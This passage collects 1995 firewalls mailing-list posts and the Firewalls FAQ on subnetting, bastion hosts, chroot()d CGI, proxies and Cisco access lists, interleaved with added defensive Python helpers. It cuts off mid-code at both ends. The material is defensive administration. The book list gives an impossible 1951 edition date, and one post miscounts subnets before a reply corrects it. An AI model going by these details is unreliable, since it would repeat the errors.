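    hosts = 2 ** (HOST_BITS_CLASS_C - subnet_bits) - 2  # minus network and broadcast
    return subnets, hosts


def first_usable_host(class_c, subnet_bits, allow_special=False):
    """Lowest address a strict router would let you assign to a host."""
    for row in subnet_table(class_c, subnet_bits, allow_special):
        if row["usable"]:
            return row["first_host"]
    return None


def format_rows(rows):
    """Render the rows the way the hand-drawn table in the thread does."""
    fmt = "%-16s %-32s %-16s %s"
    lines = [fmt % ("Network", "Hosts", "Broadcast", "Usable")]
    for row in rows:
        lines.append(fmt % (row["network"],
                            "%s - %s" % (row["first_host"], row["last_host"]),
                            row["broadcast"],
                            "yes" if row["usable"] else "no (reserved)"))
    return "\n".join(lines)


if __name__ == "__main__":
    print("mask:", subnet_mask(5))
    print("usable subnets, hosts each:", usable_counts(5),
          "/ with subnet zero and all-ones:", usable_counts(5, True))
    print(format_rows(subnet_table("192.0.2.0/24", 5)))
```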
From firewalls-owner Fri Sep 15 12:48:36 1995
From: matt <100632.1345@compuserve.com>
Date: 15 Sep 95 14:34:53 EDT
To: firewalls-mailing-list
Subject: re:firewall with only one ip-address???

Hi all,

first we would like to thank you for all the replies we got. Most of them were very useful; however, we didn't understand some of the criticism for not using a whole class C net. But some of you answered it very well, there is nothing to add! We even thank you for a few commercial offers, but we don't want to use commercial products for several reasons.

Briefly, here is our solution: We have contacted our provider, and we got a second IP address. So we could build it like this:

        -----------
       |           |
       |  internet |
       |           |
        -----------
             |
             |ISDN
        -----------                  -----------           -----------
       |           |a.b.c.d  a.b.c.e|           |10.1.1.1 |           |
       |  router   |-----------------| firewall  |---------|private net|
       |    PC     |                 |   UNIX    |         | 10.x.y.z  |
        -----------                  -----------           -----------

Our IP addresses are already in use, but it will take a few weeks until a.b.c.e can be translated to our hostname, so we cannot receive emails yet. But we have already tested services like ftp, telnet, WWW, news, and it works ok. The router uses the KA9Q routing software, and the firewall is running the TIS fwtk toolkit. They seem to be really good tools!
Thanx again for your support,

matt rolf

From firewalls-owner Fri Sep 15 13:09:20 1995
From: peter@nmti.com (Peter da Silva)
Subject: Re: Multiple levels of security (was Secure version of sendmail)
To: mdr@vodka.sse.att.com
Date: Fri, 15 Sep 1995 12:38:17 -0500 (CDT)
Cc: peter@nmti.com, firewalls@GreatCircle.COM

> True, applications programmers can get lazy, and even the best ones
> may not have security in mind. That makes the secure OS *more*
> valuable not less. Are you trying to imply that they will be lazier
> because they trust a secure OS more?

That's exactly what I'm saying. It's like they're using a PC and you install a virus checker on the PC LAN and all of a sudden all these new applications show up. You're probably *more* likely to get a virus.

> The lazy ones can't get any worse.

It's not that they're lazy. It's that they're energetic but not interested in security. They haven't put IRC on their firewall yet because it's not "safe", but now you've put a B level system under them they will.
> If they weren't thinking about security under C1 (no security) they won't
> bother to think less about it under B level security.

D is no security. C1 is discretionary access control. C2 mostly adds auditing. And, yes, they will think less about security under B level because they think they're OK. I've seen it happen too many times... not this specific example, but others that are pretty similar.

From firewalls-owner Fri Sep 15 13:31:34 1995
From: lpierce@intex.net (S. Lane Pierce)
Date: Fri, 15 Sep 1995 15:16:54 -0500
To: Dean Waters, firewalls@GreatCircle.COM
Subject: Re: 5 bit subnet for Bastion

At 11:00 AM 9/15/95 -0700, Dean Waters wrote:
> I don't know if this is the proper place for this but I will give it a try.
>
> I am setting up a Livingston Firewall router and want to use only a small
> portion of one of our subnets for the unprotected host/hosts. It has been
> suggested that I use a 5-bit subnet for this. Is this feasible? If so does
> that mean I would use 1-32 for hosts on that subnet? Then what subnet mask
> would I use.
[.sig snipped]

Dean-

You should have no problem with this. A 5 bit subnet mask for a class C network would be 255.255.255.248.
This will yield 32 network addresses with 6 hosts per address (will someone check my math :) ). Tabulated, this would look like:

Network             Host                   Broadcast
~~~~~~~~~~~~~~~~    ~~~~~~~~~~~~~~~~~~     ~~~~~~~~~~~~~~~~~~
254.254.254.0       254.254.254.1 - 6      254.254.254.7
254.254.254.8       254.254.254.9 - 14     254.254.254.15
254.254.254.16      254.254.254.17 - 22    254.254.254.23
....

You get the picture. This subnet mask (255.255.255.248) looks like this:

11111111.11111111.11111111.11111000

Where 29 bits are used for the network and 3 bits are used for the host.

Good luck,
S. Lane Pierce
lpierce@intex.net

From firewalls-owner Fri Sep 15 13:32:18 1995
From: mramirez@imparcial.com.mx
Date: Tue, 12 Sep 1995 22:39:43 -0600
To: firewalls@greatcircle.com
Subject: Help with CISCO 2511

I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400 FAX). I'm having problems trying to configure the receiving modems to support 14,400 bps from the callers. Actually my users can only connect to the modems at 9600 bps, and the technical support from CISCO told me that I have to change my modems to 28,800 bps, that's the only way that my receiving modems can receive calls at 14,400 bps. Is it true?? Because I think there is some problem with the configuration of the CISCO (in dedicated or interactive mode).

Thanks..

From firewalls-owner Fri Sep 15 13:32:44 1995
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Subject: Re: 5 bit subnet for Bastion
To: dwaters@RedBrick.COM (Dean Waters)
Date: Fri, 15 Sep 1995 15:15:36 -0500 (EST)
Cc: firewalls@GreatCircle.COM

> I don't know if this is the proper place for this but I will give it a try.

No, but what the hell. :-)

> I am setting up a Livingston Firewall router and want to use only a small
> portion of one of our subnets for the unprotected host/hosts. It has been
> suggested that I use a 5-bit subnet for this. Is this feasible? If so does
> that mean I would use 1-32 for hosts on that subnet? Then what subnet mask
> would I use.

A 5 bit mask (255.255.255.248 with a classful 'c' network address) would yield 30 usable subnets with 6 usable hosts on each subnet. Unless you decide to use IP subnet 0, the first subnet would remain 'reserved' and the first usable host address would be .9.
- paul
_______________________________________________________________________________
Paul Ferguson                          Dulcius Ex Asperis
US Sprint                              tel: 703.689.6828
Managed Network Engineering            internet: paul@hawk.sprintmrn.com
Reston, Virginia USA                   http://www.sprintmrn.com

From firewalls-owner Fri Sep 15 13:40:37 1995
From: miorelli@pweh.com (BoB Miorelli)
Date: Fri, 15 Sep 95 14:53:45 -0400
To: firewalls@greatcircle.com
Subject: Running an application through a firewall

We have been tasked with allowing a rather ugly scenario through our firewall. This is a client/server application with the client at a customer site and the server (a database server) at our site.
The database contains proprietary data that should not be seen by unauthorized individuals. We have a dual firewall system with a choke router between them, both firewall machines running TIS. This is a very complex application, and writing a server that runs on the firewall or on another machine outside the firewall and passes requests in through the firewall seems a bit too much. Has anyone had a similar request and found a reasonable solution?? The application in mind is IBM's 'Product Manager'. Any help will be appreciated.

-->BoB Miorelli, Pratt & Whitney
miorelli@pweh.com

From firewalls-owner Fri Sep 15 13:48:25 1995
From: "Jim Carroll"
Organization: Data General (Canada) Inc.
To: firewalls@greatcircle.com
Date: Fri, 15 Sep 1995 15:33:23 -0500
Subject: Re: WWW - http - cgi_scripts
Reply-To: jcarroll@wellspring.us.dg.com

Rumour has it that on 15 Sep 95 at 10:00, long-morrow@CS.YALE.EDU said:

> Also, consider running your httpd chroot()d so that the CGI
> scripts have to run in this virtual "jail" as well.
>
> It can be a pain (you have to make sure that anything that CGI programs need --
> shared libraries, perl interpreter and library modules -- exists within the
> chroot()d hierarchy), but it should help to contain a CGI program gone haywire
> (or one that an external WWW user attempted to trick and hijack).
>
> We run a number of CGI programs in a chroot()d environment.

Although this is the kind of config that I prefer to use, I'll mention (for those who haven't already figured it out) that whatever you put in the chroot()d hierarchy could possibly be used against you. For example, if you have sybperl in the chroot()d environment in order to connect to an internal Sybase database, it follows then that a hacker has all the pieces necessary to punch a hole into your trusted network (assuming they are able to break into the chroot()d area in the first place). I only mention sybperl since the necessary network device files would exist to facilitate the client-server connection. Of course, as has been mentioned earlier, if the hacker is able to mknod whatever device special files, then perl alone would be sufficiently deadly.

For the paranoid, it's worth undumping and creating standalone executable perl programs and avoiding installing full-blown perl into the chroot()d hierarchy. This usually translates into your exposed Web server becoming a production system and you having another system internally for mucking around. But I digress.

If anybody is thinking of dredging up that old "the paranoid should never leave anything on the bastion which could be used against you, period," don't bother, because I just did. ;)

--
Jim Carroll - jcarroll@wellspring.us.dg.com
... the usual disclaimers ...
## The more I learn, the less I know.              ##
## Eventually I'll know everything about nothing.  ##
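Jim Carroll's point above is that anything left inside the jail can be turned against you. As an added example that is not his code and not from any poster, the script below walks a chroot()d hierarchy and reports the pieces he names: device special files, setuid/setgid executables and full interpreters such as perl, plus world-writable directories; INTERPRETER_NAMES is an assumed list, and build_sample_jail constructs a throwaway tree so the audit can be tried offline.

```python
"""Audit a chroot()d web-server hierarchy for pieces that could be turned against you.

Added example, not the poster's code.  It walks the jail without following
symlinks and reports the things the post singles out: device special files
(what a database client needs to reach the network), setuid/setgid
executables, full interpreters and shells such as perl, and, in addition,
world-writable directories where an intruder could stage files.
"""
import os
import stat
import tempfile

# Assumed list: general-purpose interpreters and shells that an undumped,
# standalone CGI program would not need inside the jail.
INTERPRETER_NAMES = {"perl", "sh", "bash", "ksh", "csh", "tcsh", "python", "tclsh", "awk"}


def classify(path, st):
    """Return a finding label for one entry (st from os.lstat), or None if benign."""
    mode = st.st_mode
    if stat.S_ISCHR(mode) or stat.S_ISBLK(mode):
        return "device special file"
    if stat.S_ISDIR(mode):
        if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            return "world-writable directory without sticky bit"
        return None
    if not stat.S_ISREG(mode):
        return None  # symlinks, fifos and sockets are left alone here
    if mode & (stat.S_ISUID | stat.S_ISGID):
        return "setuid/setgid executable"
    stem = os.path.basename(path).rstrip("0123456789.")  # perl5, python2.7 -> perl, python
    if mode & 0o111 and stem in INTERPRETER_NAMES:
        return "general-purpose interpreter or shell"
    return None


def audit_jail(root):
    """Sorted (label, path relative to root) pairs for everything worth a second look."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: never follow a link out of the jail
            except OSError:
                continue  # entry vanished or unreadable; skip rather than abort
            label = classify(full, st)
            if label:
                findings.append((label, os.path.relpath(full, root)))
    return sorted(findings)


def build_sample_jail():
    """Constructed sample tree (not a real server) so the audit can be tried offline."""
    root = tempfile.mkdtemp(prefix="cgi-jail-")
    for rel in ("usr/bin", "tmp", "var/tmp", "cgi-bin"):
        os.makedirs(os.path.join(root, rel))
    for rel, mode in (("usr/bin/perl5", 0o755),       # full interpreter
                      ("usr/bin/suidhelper", 0o4755),  # setuid binary
                      ("cgi-bin/lookup", 0o755)):      # plain CGI program
        full = os.path.join(root, rel)
        with open(full, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(full, mode)
    os.chmod(os.path.join(root, "tmp"), 0o777)       # sloppy: no sticky bit
    os.chmod(os.path.join(root, "var/tmp"), 0o1777)  # sticky bit set, acceptable
    return root


if __name__ == "__main__":
    for label, rel in audit_jail(build_sample_jail()):
        print("%-45s %s" % (label, rel))
```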
From firewalls-owner Fri Sep 15 13:57:27 1995
From: fwalls-faq@tis.com
Date: Wed, 13 Sep 1995 21:51:28 -0400
To: firewalls@greatcircle.com
Reply-To: fwalls-faq@tis.com
Subject: Firewalls FAQ (Rev 8, updated Wed Sep 13 21:50:35 1995)
X-Posting-Frequency: first day of the month

Internet Firewalls Frequently Asked Questions

FAQ Maintainer: Marcus J. Ranum

About the FAQ

This FAQ is not an advertisement or endorsement for any product, company, or consultant. The maintainer welcomes input and comments on the contents of this FAQ. Comments related to the FAQ should be addressed to Fwalls-FAQ@iwi.com. The FAQ is also available via WWW from http://www.iwi.com. As of this writing, the FAQ's primary format is HTML.

Contents:

1. What is a network firewall?
2. Why would I want a firewall?
3. What can a firewall protect against?
4. What can't a firewall protect against?
5. What about viruses?
6. What are good sources of print information on firewalls?
7. Where can I get more information on firewalls on the network?
8. What are some commercial products or consultants who sell/service firewalls?
9. What are some of the basic design decisions in a firewall?
10. What are some of the basic types of firewall?
11. What are proxy servers and how do they work?
12. What are some cheap packet screening tools?
13. What are some reasonable filtering rules for a Cisco?
14. How do I make Web/http work with a firewall?
15. How do I make DNS work with a firewall?
16. How do I make FTP work through my firewall?
17. How do I make Telnet work through my firewall?
18. How do I make Finger and whois work through my firewall?
19. How do I make gopher, archie, and other services work through my firewall?
20. What are the issues about X-Window through a firewall?
21. What is source routed traffic and why is it a threat?
22. What are ICMP redirects and redirect bombs?
23. What about denial of service?
24. Glossary of firewall related terms
25. Contributors

What is a network firewall?

A firewall is a system or group of systems that enforces an access control policy between two networks. The actual means by which this is accomplished varies widely, but in principle, the firewall can be thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic. Probably the most important thing to recognize about a firewall is that it implements an access control policy. If you don't have a good idea what kind of access you want to permit or deny, or you simply permit someone or some product to configure a firewall based on what they or it think it should do, then they are making policy for your organization as a whole.

Why would I want a firewall?

The Internet, like any other society, is plagued with the kind of jerks who enjoy the electronic equivalent of writing on other people's walls with spraypaint, tearing their mailboxes off, or just sitting in the street blowing their car horns. Some people try to get real work done over the Internet, and others have sensitive or proprietary data they must protect. Usually, a firewall's purpose is to keep the jerks out of your network while still letting you get your job done.
Many traditional-style corporations and data centers have computing security policies and practices that must be adhered to. In a case where a company's policies dictate how data must be protected, a firewall is very important, since it is the embodiment of the corporate policy. Frequently, the hardest part of hooking to the Internet, if you're a large company, is not justifying the expense or effort, but convincing management that it's safe to do so. A firewall provides not only real security - it often plays an important role as a security blanket for management.

Lastly, a firewall can act as your corporate "ambassador" to the Internet. Many corporations use their firewall systems as a place to store public information about corporate products and services, files to download, bug-fixes, and so forth. Several of these systems have become important parts of the Internet service structure (e.g.: UUnet.uu.net, whitehouse.gov, gatekeeper.dec.com) and have reflected well on their organizational sponsors.

What can a firewall protect against?

Some firewalls permit only Email traffic through them, thereby protecting the network against any attacks other than attacks against the Email service. Other firewalls provide less strict protections, and block services that are known to be problems.

Generally, firewalls are configured to protect against unauthenticated interactive logins from the "outside" world. This, more than anything, helps prevent vandals from logging into machines on your network. More elaborate firewalls block traffic from the outside to the inside, but permit users on the inside to communicate freely with the outside. The firewall can protect you against any type of network-borne attack if you unplug it.

Firewalls are also important since they can provide a single "choke point" where security and audit can be imposed.
Unlike in a situation where a computer system is being attacked by someone dialing in with a modem, the firewall can act as an effective "phone tap" and tracing tool. Firewalls provide an important logging and auditing function; often they provide summaries to the administrator about what kinds and amount of traffic passed through it, how many attempts there were to break into it, etc.

What can't a firewall protect against?

Firewalls can't protect against attacks that don't go through the firewall. Many corporations that connect to the Internet are very concerned about proprietary data leaking out of the company through that route. Unfortunately for those concerned, a magnetic tape can just as effectively be used to export data. Many organizations that are terrified (at a management level) of Internet connections have no coherent policy about how dial-in access via modems should be protected. It's silly to build a 6-foot thick steel door when you live in a wooden house, but there are a lot of organizations out there buying expensive firewalls and neglecting the numerous other back-doors into their network. For a firewall to work, it must be a part of a consistent overall organizational security architecture. Firewall policies must be realistic, and reflect the level of security in the entire network. For example, a site with top secret or classified data doesn't need a firewall at all: they shouldn't be hooking up to the internet in the first place, or the systems with the really secret data should be isolated from the rest of the corporate network.

Another thing a firewall can't really protect you against is traitors or idiots inside your network. While an industrial spy might export information through your firewall, he's just as likely to export it through a telephone, FAX machine, or floppy disk. Floppy disks are a far more likely means for information to leak from your organization than a firewall!

Firewalls also cannot protect you against stupidity.
Users who reveal sensitive information over the telephone are good targets for social engineering; an attacker may be able to break into your network by completely bypassing your firewall, if he can find a "helpful" employee inside who can be fooled into giving access to a modem pool.

What about viruses?

Firewalls can't protect very well against things like viruses. There are too many ways of encoding binary files for transfer over networks, and too many different architectures and viruses to try to search for them all. In other words, a firewall cannot replace security-consciousness on the part of your users. In general, a firewall cannot protect against a data-driven attack -- attacks in which something is mailed or copied to an internal host where it is then executed. This form of attack has occurred in the past against various versions of Sendmail and GhostScript, a freely-available PostScript viewer.

Organizations that are deeply concerned about viruses should implement organization-wide virus control measures. Rather than trying to screen viruses out at the firewall, make sure that every vulnerable desktop has virus scanning software that is run when the machine is rebooted. Blanketing your network with virus scanning software will protect against viruses that come in via floppy disks, modems, and Internet. Trying to block viruses at the firewall will only protect against viruses from the Internet - and the vast majority of viruses are caught via floppy disks.

What are good sources of print information on firewalls?

There are several books that touch on firewalls. The best known are:

* Title: Firewalls and Internet Security: Repelling the Wily Hacker
  Authors: Bill Cheswick and Steve Bellovin
  Publisher: Addison Wesley
  Edition: 1994
  ISBN: 0-201-63357-4

* Title: Building Internet Firewalls
  Authors: D. Brent Chapman and Elizabeth Zwicky
  Publisher: O'Reilly
  Edition: 1951
  ISBN: 1-56592-124-0

* Title: Practical Unix Security
  Authors: Simson Garfinkel and Gene Spafford
  Publisher: O'Reilly
  Edition: 1991
  ISBN: 0-937175-72-2
  (discusses primarily host security)

Related references are:

* Titles: Internetworking with TCP/IP Vols I, II and III
  Authors: Douglas Comer and David Stevens
  Publisher: Prentice-Hall
  Edition: 1991
  ISBN: 0-13-468505-9 (I), 0-13-472242-6 (II), 0-13-474222-2 (III)
  Comment: A detailed discussion on the architecture and implementation of the Internet and its protocols. Vol I (on principles, protocols and architecture) is readable by everyone, Vol 2 (on design, implementation and internals) is more technical, and Vol 3 (on client-server computing) is recently out.

* Title: Unix System Security - A Guide for Users and System Administrators
  Author: David Curry
  Publisher: Addison Wesley
  Edition: 1992
  ISBN: 0-201-56327-4

Where can I get more information on firewalls on the network?

* Ftp.greatcircle.com - Firewalls mailing list archives. Directory: pub/firewalls
* Ftp.tis.com - Internet firewall toolkit and papers. Directory: pub/firewalls
* Research.att.com - Papers on firewalls and breakins. Directory: dist/internet_security
* Net.Tamu.edu - Texas AMU security tools. Directory: pub/security/TAMU
* iwi.com - Internet attacks presentation, firewall standards

The internet firewalls mailing list is a forum for firewall administrators and implementors. To subscribe to Firewalls, send "subscribe firewalls" in the body of a message (not on the "Subject:" line) to "Majordomo@GreatCircle.COM". Archives of past Firewalls postings are available for anonymous FTP from ftp.greatcircle.com in pub/firewalls/archive

What are some commercial products or consultants who sell/service firewalls?

We feel this topic is too sensitive to address in a FAQ, however, an independently maintained list (no warranty or recommendations are implied) can be found at URL: http://www.access.digex.net/~bdboyle/firewall.vendor.html

What are some of the basic design decisions in a firewall?

There are a number of basic design issues that should be addressed by the lucky person who has been tasked with the responsibility of designing, specifying, and implementing or overseeing the installation of a firewall.

The first and most important reflects the policy of how your company or organization wants to operate the system: is the firewall in place to explicitly deny all services except those critical to the mission of connecting to the net, or is the firewall in place to provide a metered and audited method of "queuing" access in a non-threatening manner? There are degrees of paranoia between these positions; the final stance of your firewall may be more the result of a political than an engineering decision.

The second is: what level of monitoring, redundancy, and control do you want? Having established the acceptable risk level (e.g.: how paranoid you are) by resolving the first issue, you can form a checklist of what should be monitored, permitted, and denied. In other words, you start by figuring out your overall objectives, and then combine a needs analysis with a risk assessment, and sort the almost always conflicting requirements out into a laundry list that specifies what you plan to implement.

The third issue is financial. We can't address this one here in anything but vague terms, but it's important to try to quantify any proposed solutions in terms of how much it will cost either to buy or to implement. For example, a complete firewall product may cost between $100,000 at the high end, and free at the low end. The free option, of doing some fancy configuring on a Cisco or similar router, will cost nothing but staff time and cups of coffee.
Implementing a high end firewall from scratch might cost several man-months, which may equate to $30,000 worth of staff salary and benefits. The systems management overhead is also a consideration. Building a home-brew is fine, but it's important to build it so that it doesn't require constant and expensive fiddling-with. It's important, in other words, to evaluate firewalls not only in terms of what they cost now, but continuing costs such as support.

On the technical side, there are a couple of decisions to make, based on the fact that for all practical purposes what we are talking about is a static traffic routing service placed between the network service provider's router and your internal network. The traffic routing service may be implemented at an IP level via something like screening rules in a router, or at an application level via proxy gateways and services.

The decision to make is whether to place an exposed stripped-down machine on the outside network to run proxy services for telnet, ftp, news, etc., or whether to set up a screening router as a filter, permitting communication with one or more internal machines. There are pluses and minuses to both approaches, with the proxy machine providing a greater level of audit and potentially security in return for increased cost in configuration and a decrease in the level of service that may be provided (since a proxy needs to be developed for each desired service). The old trade-off between ease-of-use and security comes back to haunt us with a vengeance.

What are the basic types of firewalls?

Conceptually, there are two types of firewalls:

* Network Level
* Application Level

They are not as different as you might think, and the latest technologies are blurring the distinction to the point where it's no longer clear if either one is "better" or "worse." As always, you need to be careful to pick the type that meets your needs.

Network level firewalls generally make their decisions based on the source, destination addresses and ports in individual IP packets. A simple router is the "traditional" network level firewall, since it is not able to make particularly sophisticated decisions about what a packet is actually talking to or where it actually came from. Modern network level firewalls have become increasingly sophisticated, and now maintain internal information about the state of connections passing through them, the contents of some of the data streams, and so on. One thing that's an important distinction about many network level firewalls is that they route traffic directly through them, so to use one you usually need to have a validly assigned IP address block. Network level firewalls tend to be very fast and tend to be very transparent to users.

[Figure omitted] Example Network level firewall: In this example, a network level firewall called a "screened host firewall" is represented. In a screened host firewall, access to and from a single host is controlled by means of a router operating at a network level. The single host is a bastion host; a highly-defended and secured strong-point that (hopefully) can resist attack.

[Figure omitted] Example Network level firewall: In this example, a network level firewall called a "screened subnet firewall" is represented. In a screened subnet firewall, access to and from a whole network is controlled by means of a router operating at a network level. It is similar to a screened host, except that it is, effectively, a network of screened hosts.

Application level firewalls generally are hosts running proxy servers, which permit no traffic directly between networks, and which perform elaborate logging and auditing of traffic passing through them. Since the proxy applications are software components running on the firewall, it is a good place to do lots of logging and access control.
Application level firewalls can be used as network address translators, since traffic goes in one "side" and out the other, after having passed through an application that effectively masks the origin of the initiating connection. Having an application in the way in some cases may impact performance and may make the firewall less transparent. Early application level firewalls such as those built using the TIS firewall toolkit, are not particularly transparent to end users and may require some training. Modern application level firewalls are often fully transparent. Application level firewalls tend to provide more detailed audit reports and tend to enforce more conservative security models than network level firewalls.

[Figure omitted] Example Application level firewall: In this example, an application level firewall called a "dual homed gateway" is represented. A dual homed gateway is a highly secured host that runs proxy software. It has two network interfaces, one on each network, and blocks all traffic passing through it.

The future of firewalls lies someplace between network level firewalls and application level firewalls. It is likely that network level firewalls will become increasingly "aware" of the information going through them, and application level firewalls will become increasingly "low level" and transparent. The end result will be a fast packet-screening system that logs and audits data as it passes through.

Increasingly, firewalls (network and application layer) incorporate encryption so that they may protect traffic passing between them over the Internet. Firewalls with end-to-end encryption can be used by organizations with multiple points of Internet connectivity to use the Internet as a "private backbone" without worrying about their data or passwords being sniffed.

What are proxy servers and how do they work?

A proxy server (sometimes referred to as an application gateway or forwarder) is an application that mediates traffic between a protected network and the Internet. Proxies are often used instead of router-based traffic controls, to prevent traffic from passing directly between networks. Many proxies contain extra logging or support for user authentication. Since proxies must "understand" the application protocol being used, they can also implement protocol specific security (e.g., an FTP proxy might be configurable to permit incoming FTP and block outgoing FTP).

Proxy servers are application specific. In order to support a new protocol via a proxy, a proxy must be developed for it. One popular set of proxy servers is the TIS Internet Firewall Toolkit ("FWTK") which includes proxies for Telnet, rlogin, FTP, X-Window, http/Web, and NNTP/Usenet news.

SOCKS is a generic proxy system that can be compiled into a client-side application to make it work through a firewall. Its advantage is that it's easy to use, but it doesn't support the addition of authentication hooks or protocol specific logging. For more information on SOCKS, see ftp.nec.com: /pub/security/socks.cstc. Users are encouraged to check the file "FILES" for a description of the directory's contents.

What are some cheap packet screening tools?

The Texas AMU security tools include software for implementing screening routers (FTP net.tamu.edu, pub/security/TAMU). Karlbridge is a PC-based screening router kit: ftp://ftp.net.ohio-state.edu/pub/kbridge. A version of the Digital Equipment Corporation "screend" kernel screening software is available for BSD/386, NetBSD, and BSDI. Many commercial routers support screening of various forms.

What are some reasonable filtering rules for a Cisco?

The following example shows one possible configuration for using the Cisco as a filtering router. It is a sample that shows the implementation of a specific policy. Your policy will undoubtedly vary.

[Figure omitted] In this example, a company has a Class B network address of 128.88.0.0 and is using 8 bits for subnets. The Internet connection is on the "red" subnet 128.88.254.0. All other subnets are considered trusted or "blue" subnets.

Keeping the following points in mind will help in understanding the configuration fragments:

1. In these rules the Ciscos are applying filtering to output packets only.
2. Rules are tested in order and stop when the first match is found.
3. There is an implicit deny rule at the end of an access list that denies everything.

The example below concentrates on the filtering parts of a configuration. Line numbers and formatting have been added for readability.

The policy to be implemented is:

* Anything not explicitly allowed is denied
* Traffic between the external gateway machine and blue net hosts is allowed.
* Permit services originating from the blue net.
* Allow a range of ports for FTP data connections back to the blue net.

     1. no ip source-route
     2. !
     3. interface Ethernet 0
     4. ip address 128.88.254.3 255.255.255.0
     5. ip access-group 10
     6. !
     7. interface Ethernet 1
     8. ip address 128.88.1.1 255.255.255.0
     9. ip access-group 11
    10. !
    11. access-list 10 permit ip 128.88.254.2 0.0.0.0 128.88.0.0 0.0.255.255
    12. access-list 10 deny tcp 0.0.0.0 255.255.255.255 128.88.0.0 0.0.255.255 lt 1025
    13. access-list 10 deny tcp 0.0.0.0 255.255.255.255 128.88.0.0 0.0.255.255 gt 4999
    14. access-list 10 permit tcp 0.0.0.0 255.255.255.255 128.88.0.0 0.0.255.255
    15. !
    16. access-list 11 permit ip 128.88.0.0 0.0.255.255 0.0.0.0 255.255.255.255
    17. access-list 11 deny tcp 128.88.0.0 0.0.255.255 0.0.0.0 255.255.255.255 eq 25
    18. access-list 11 permit tcp 128.88.0.0 0.0.255.255 0.0.0.0 255.255.255.255

Explanation

* No Ip source-route: Although this is not a filtering rule, it is good to include here. The no Ip source-route directive tells the router to drop all source-routed packets.
* ip access-group 10: Ethernet 0 is on the red net.
  Extended access list 10 will be applied to output on this interface. You can also think of output from the red net as input on the blue net.
* ip access-group 11: Ethernet 1 is on the blue net. Extended access list 11 will be applied to output on this interface.
* Permit ip 128.88.254.2: Allow all traffic from the gateway machine to the blue net.
* access-list 10 permit tcp: Allow connections originating from the red net that come in between ports 1024 and 5000. This is to allow ftp data connections back into the blue net. 5000 was chosen as the upper limit as it is where OpenView starts. Note: again, we are assuming this is acceptable for the given policy. There is no way to tell a Cisco to filter on source port. Newer versions of the Cisco firmware will apparently support source port filtering. Since the rules are tested until the first match, we must use this rather obtuse syntax.
* access-list 11 permit ip: Allow all blue net packets to the gateway machine.
* access-list 11 deny tcp: Deny SMTP (tcp port 25) mail to the red net.
* access-list 11 permit tcp: Allow all other TCP traffic to the red net.

Cisco.Com has an archive of examples for building firewalls using Cisco routers, available for FTP from: ftp.cisco.com in /pub/acl-examples.tar.Z

Newer revisions of the Cisco firmware (starting at 9.21) allow the administrator to specify packet filtering on inbound or outbound packets.

How do I make Web/HTTP work through my firewall?

There are 3 ways to do it - Pick one:

* Allow "established" connections out via a router, if you are using screening routers.
* Use a Web client that supports SOCKS, and run SOCKS on your firewall.
* Run some kind of proxy-capable Web server on the firewall.

The TIS firewall toolkit includes a proxy called http-gw, which proxies Web, gopher/gopher+ and FTP. CERN httpd also has a proxy capability, which many sites use in combination with the server's ability to cache frequently accessed pages.
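Before loading a policy like the Cisco example above onto a router, it helps to replay sample packets through the access lists under the three rules the FAQ states (output filtering, first match wins, implicit deny at the end). The following Python evaluator is an added example written for this page; it is not part of the FAQ and not Cisco software. It parses the seven access-list lines quoted above, models Cisco wildcard masks (a 1 bit means "don't care"), the lt/gt/eq destination-port tests, and the "established" keyword mentioned under the Web/HTTP question (match only TCP segments with ACK or RST set). The sample addresses (192.0.2.7 as an outside host, 128.88.1.5 as a blue net host) are constructed for the example.

```python
# Added example: first-match evaluator for the extended access lists quoted in
# the FAQ. Not part of the FAQ or of any Cisco software; sample hosts are constructed.
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

# The seven access-list lines from the FAQ's sample configuration, verbatim.
FAQ_ACL = """
access-list 10 permit ip 128.88.254.2 0.0.0.0 128.88.0.0 0.0.255.255
access-list 10 deny tcp 0.0.0.0 255.255.255.255 128.88.0.0 0.0.255.255 lt 1025
access-list 10 deny tcp 0.0.0.0 255.255.255.255 128.88.0.0 0.0.255.255 gt 4999
access-list 10 permit tcp 0.0.0.0 255.255.255.255 128.88.0.0 0.0.255.255
access-list 11 permit ip 128.88.0.0 0.0.255.255 0.0.0.0 255.255.255.255
access-list 11 deny tcp 128.88.0.0 0.0.255.255 0.0.0.0 255.255.255.255 eq 25
access-list 11 permit tcp 128.88.0.0 0.0.255.255 0.0.0.0 255.255.255.255
"""


@dataclass
class Rule:
    text: str
    list_id: str
    action: str                     # "permit" or "deny"
    proto: str                      # "ip" matches every protocol; otherwise "tcp", "udp", ...
    src: int
    src_wild: int                   # Cisco wildcard mask: a 1 bit means "don't care"
    dst: int
    dst_wild: int
    port_op: Optional[str] = None   # "lt", "gt" or "eq", applied to the destination port
    port: Optional[int] = None
    established: bool = False       # match only TCP segments with ACK or RST set


def _ip(dotted: str) -> int:
    return int(ipaddress.IPv4Address(dotted))


def parse_acl(text: str) -> List[Rule]:
    """Parse 'access-list N permit|deny PROTO SRC WILD DST WILD [lt|gt|eq PORT] [established]'."""
    rules = []
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) < 8 or parts[0] != "access-list":
            continue   # blank lines, "!" comments and interface statements are skipped
        rule = Rule(raw.strip(), parts[1], parts[2], parts[3],
                    _ip(parts[4]), _ip(parts[5]), _ip(parts[6]), _ip(parts[7]))
        tail = parts[8:]
        while tail:
            if tail[0] in ("lt", "gt", "eq"):
                rule.port_op, rule.port = tail[0], int(tail[1])
                tail = tail[2:]
            elif tail[0] == "established":
                rule.established = True
                tail = tail[1:]
            else:
                raise ValueError("unsupported keyword %r in: %s" % (tail[0], raw))
        rules.append(rule)
    return rules


def _wild_match(addr: int, rule_addr: int, wild: int) -> bool:
    care = ~wild & 0xFFFFFFFF        # bits the rule actually compares
    return (addr & care) == (rule_addr & care)


def evaluate(rules: List[Rule], list_id: str, proto: str, src: str, dst: str,
             dport: Optional[int] = None, ack_or_rst: bool = False) -> Tuple[str, Optional[Rule]]:
    """Walk one access list top to bottom and return (action, matching rule).

    Rules are tested in order and the first match wins; running off the end
    of the list is the implicit deny, reported with rule None.
    """
    s, d = _ip(src), _ip(dst)
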